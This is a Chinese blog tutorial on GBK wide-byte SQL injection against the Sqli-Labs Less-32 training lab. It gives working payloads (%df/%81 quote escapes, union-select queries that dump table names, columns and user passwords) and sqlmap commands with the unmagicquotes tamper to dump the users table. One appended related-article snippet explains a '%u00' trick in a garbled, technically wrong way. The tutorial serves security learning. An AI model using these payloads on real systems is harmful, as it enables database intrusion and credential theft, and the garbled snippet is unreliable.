SQL注入 | 宽字节注入2

最新推荐文章于 2024-09-02 17:31:41 发布
最新推荐文章于 2024-09-02 17:31:41 发布
阅读量1.6k 收藏 2
点赞数 2
分类专栏: 渗透测试学习 Web安全 信息安全 文章标签: sql mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m_de_g/article/details/121874260
版权

SQL注入 | 宽字节注入2

1.宽字节注入基础

最常使用的宽字节注入是利用%df,其实我们只要第一个ASCII码大于128就可以了,比如ASCII码为129的就可以,但是我们怎么将他转换为URL编码呢,其实很简单,我们先将129(十进制)转换为十六进制,为0x81,如图所示,然后在十六进制前面加%即可,即为%81

GBK首字节对应0x81-0xFE,尾字节对应0x40-0xFE(除0x7F)

2.宽字节注入代码分析

mysql_real_escape_string()addslashes()功能类似
在这里插入图片描述
上述函数过滤了反斜杠单双引号,MySQL使用了GBK编码

3.宽字节SQL注入演示

Sqli-Labs-Less32为例
1.当我们使用1'时,发现被单引号转义
在这里插入图片描述
2.使用前面讲到的知识点,使用下述语句进行探测

?id=1%df%27 --+

在这里插入图片描述

3.将%df换成%81进行探测,发现依然可以

?id=1%81%27 --+

在这里插入图片描述
4.查看注入点

?id=-1%81%27 union select 1,2,3--+

在这里插入图片描述

5.使用union注入,获取数据库信息

-1%81%27 union select 1,database(),3--+

在这里插入图片描述
6.得到数据库security,获取数据表信息

?id=-1%81%27 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+

在这里插入图片描述

7.字符串转十六进制在线网站
https://www.bejson.com/convert/ox2str/
在这里插入图片描述
因为单引号被过滤,因此将数据表名转换为十六进制
我们使用users表,查看其字段名

?id=-1%81%27 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273),3--+

在这里插入图片描述
8.获取字段内容

?id=-1%81%27 union select 1,(select group_concat(id,username,password) from users),3--+

在这里插入图片描述

4.sqlmap安全检测

1.使用sqlmap探测,可以发现可以使用布尔盲注报错注入时间盲注union注入

python2 sqlmap.py -u "http://url/?id=1" --tamper=unmagicquotes.py

在这里插入图片描述
2.获取数据库的信息

python2 sqlmap.py -u "http://localhost/sqli-labs-master/Less-32/?id=1" --tamper=unmagicquotes.py --dbs

在这里插入图片描述
3.使用数据库security,获取表名信息

python2 sqlmap.py -u "http://localhost/sqli-labs-master/Less-32/?id=1" --tamper=unmagicquotes.py -D security --tables

在这里插入图片描述
4.使用数据库security,数据表users,获取字段及内容

python2 sqlmap.py -u "http://localhost/sqli-labs-master/Less-32/?id=1" --tamper=unmagicquotes.py -D security -T users --dump

在这里插入图片描述

山川绿水
关注
专栏目录
sqlmap跑宽字节注入(渗透测试之SQL注入宽字节注入)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-09 915
宽字节注入就是用一个大于128的十六进制数来吃掉转义符,gbk编码,字节作为一个字符的编码手工注入 一、什么是宽字节注入 宽字节是相对于ascII这样单字节而言的;像 GB2312、GBK、GB18030、BIG5、Shift_JIS 等这些都是常说的宽字节,实际上只有两字节。GBK 是一种多字符的编码,通常来说,一个 gbk 编码汉字,占用2个字节。一个 utf-8 编码的汉字,占用3个字节。 转义函数:为了过滤用户输入的一些数据,对特殊的字符加上反斜杠“\”进行转义; 宽字节注入指的是 mysql 数据
SQL注入宽字节注入
m0_56578216的博客
08-24 368
宽字节注入准确来说不是注入手法,而是另外一种比较特殊的情况。宽字节注入是一种绕过单双引号转义的手段,严格来说并不是注入手段。
如何运用宽字节实现Sql注入
MSB_WLAQ的博客
10-08 318
什么是魔术引号 了解一个PHP的防御函数==》magic_quotes_gpc(魔术引号开关) magic_quotes_gpc函数在php中的作用是判断解析用户提交的数据,如包括有:post、get、cookie过来的数据增加转义字符“\”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误。 单引号(’)、双引号(”)、反斜线(\)等字符都会被加上反斜线 magic_quotes_gpc的作用:当PHP的传参中有特殊字符就会再前面加转义字符'\',来做一定的过滤.
渗透测试-SQL注入宽字节注入
lza20001103的博客
04-20 9126
渗透测试-SQL注入宽字节注入
Day05
最新发布
Hzzz233的博客
09-02 708
判断是否存在注入点判断字段数量判断字段前端回显位置判断数据库信息查找数据库名查找数据库表名查找列名查数据。
宽字节注入(二)
qq_45300786的博客
07-16 221
@$sql = 'select *from user where id=("'.$id.'")' 这里只是加了过滤,我要我们把前面的单引号闭合就可以了。再把后面的注释掉就是了。 %df") and 1=1 -- + 后面的跟上一篇的宽字节注入(一)是一个思路的。 ...
宽字节注入源码
aiquan9342的博客
12-05 202
原文转载自:http://www.cnblogs.com/Fluorescence-tjy/p/5911640.html <?php<br> // 面向对象写法 $id=addslashes($_GET[‘id’]); //获取id并转义预定义字符 // /$id=$_GET[‘id’];<br> $mysqli=new mysqli(‘...
sqli-labs/less-24;宽字节注入
xiaochenhang的博客
08-18 354
2、 当数据库的编码为GBK时,可以使用宽字节注入,宽字节的格式是在地址后先加一个%df,再加单引号,因为反斜杠的编码为%5c,而在GBK编码中,%df%5c是繁体字“連”,所以这时,单引号成功逃逸。1、在使用gbk的编码情况下,一个中文占了两个字节;中文的第一个字节加上被转义的特殊字符(\')后,转义符\会被认为是中文的第二个字节,这样单引号'就脱离了转义,形成了宽字节注入;这个语句没问题,可是'security' 两侧单引号也会被转义,这里使用嵌套查询来逃逸;4、联合查询,判断回显点;...
SQL注入宽字节注入
qq_45557130的博客
10-09 414
sql注入宽字节注入
第十九节 宽字节SQL注入-01
09-15
宽字节注入代码分析 在宽字节SQL注入攻击中,攻击者可以使用 Php 的addslashes 函数来转义特殊字符,例如将“'”转义为“%DF\'”。然后,在MYSQL中,这个宽字符将被认为是一个合法的字符,从而 bypass 数据库的安全...
SQL注入——宽字节注入
weixin_74991270的博客
10-10 522
1.转义符“\”有些符号想让他当作单纯的字符,而不是当作符号的时候,一般可以用: \符号比如:\’ \\’   这种情况下,‘和"将被当作正常的字符在数据库之中’与"几乎没有区别,在php之中 ’ 包括的内容完全当作字符串,而 " 包括的内容会进一步进行解析例如:$a=‘hello’;echo ‘$a’;//输出:aecho “$a”;//输出:hello2.为什么产生编码:--为了处理英文字符,产生了ASCII码。
sqlmap之宽字节注入(一)GET
qq_45300786的博客
07-17 1477
不懂的可以看前面的宽字节注入(一) 先给他写好闭合 %df' -- + 然后抓包 把这个数据包,保存到一个为 321.txt的文件 开始用sqlmap跑类型 跑数据库 下面还可以跑很多参数,我就不一一介绍了。 ...
SQL-lab 29~37 宽字节注入
qq_52921637的博客
03-22 237
less29 本关是基于 index.php中的单引号字符型的注入 注入语句是:id=-1’ union select 1,2,3 – - 和login.php 基于单引号的参数污染绕过 注入语句是:id=1&id=-1’ union select 1,2,3 – - less30 本关与上关相似,login.php 基于双引号的参数污染绕过 注入语句是:id=1&id=-1" union select 1,2,3 – - less31 本关是,基于 “) 字符型的注入 注入语句是:id=-
宽字节SQL注入
一米八多的瑞兹的博客
02-25 170
宽字节SQL注入 1. 宽字节注入基础 最常使用的宽字节注入是利用%df,其实我们只要第一个ascii码大于128就可以了,比如ascii码为129的就可以,但是我们怎么将他转换为URL编码呢,其实很简单,我们先将129(十进制)转换为十六进制,为0x81,如图1所示,然后在十六进制前面加%即可,即为%81 GBK首字节对应0×81-0xFE,尾字节对应0×40-0xFE(除0×7F) 2. 宽字节注入代码分析 Sqli-Less32 代码分析 mysql_real_escape_string() 和 ad
sqlmap刷sqllibs_05-宽字节注入-32-37
Xor0ne
07-29 336
本篇文章中的一些过滤讲解大部分来自于我的另外一篇博客,如果不太清楚,可以移步: Sqllibs-less32-37-宽字节 32、Bypass addslashes() 可以知道在这里过滤了斜杠、单引号、双引号,即会在符号前加上斜杠进行过滤。而由下图可以知道闭合方式为单引号,因此我们需要对这个进行绕过。 在此我们利用在单引号前加上%df,而由于转义会在单引号前面加上一个单引号,在犹豫设置了gbk编码,因此%df与斜杠(%5c)会被当做一个中文字符,这样的话,就类似于斜杠被吃掉了。 手工注入语句如下所示:
宽字节注入
东方
06-06 2749
GBK双字节编码:一个汉字用两个字节表示,首字节对应0×81-0xFE,尾字节对应0×40-0xFE(除0×7F),刚好涵盖了转义符号\对应的编码0×5C。 0xD50×5C 对应了汉字“诚”,URL编码用百分号加字符的16进制编码表示字符,于是 %d5%5c 经URL解码后为“诚”。 下面分析攻击过程: 访问 http://www.2cto.com /test.php?username=test...
SQL 注入的宽字节注入的原理
06-09
宽字节注入是一种常见的 SQL 注入技术,它利用了一些编码方式对非 ASCII 字符进行编码的特点,从而绕过某些安全机制,达到执行恶意 SQL 语句的目的。 宽字节注入的原理是将非 ASCII 字符编码为多个 ASCII 字符,然后将这些 ASCII 字符作为参数传递给应用程序,应用程序在解析这些参数时,可能会将其视为多个独立的字符,从而绕过一些安全机制。 例如,假设我们有一个包含语句的 Web 应用程序: ``` SELECT * FROM users WHERE username='admin' AND password='123456'; ``` 如果我们想使用宽字节注入技术来执行恶意 SQL 语句,我们可以将输入的用户名编码为 UTF-8 格式,并在其后面添加一个宽字节(%u00),这样就可以绕过应用程序的安全机制,注入额外的 SQL 语句,例如: ``` SELECT * FROM users WHERE username='admin%u00' OR 1=1 -- ' AND password='123456'; ``` 在这个例子中,%u00 是一个宽字节,它将 'a' 编码为 '%61%00',这样在应用程序解析这个参数时,它会将其视为两个独立的字符:'a' 和 '\u00'。因此,应用程序将执行以下 SQL 语句: ``` SELECT * FROM users WHERE username='admin' OR 1=1 -- ' AND password='123456'; ``` 其中,'--' 表示注释符号,它可以使后面的 SQL 语句被忽略,从而达到绕过验证的目的。 需要注意的是,宽字节注入是一种常见的 SQL 注入技术,但并不是万能的,它只能绕过一些简单的安全机制,对于一些高级安全机制可能无法生效。因此,在开发应用程序时,应该使用参数化查询或 ORM 框架等技术来防止 SQL 注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值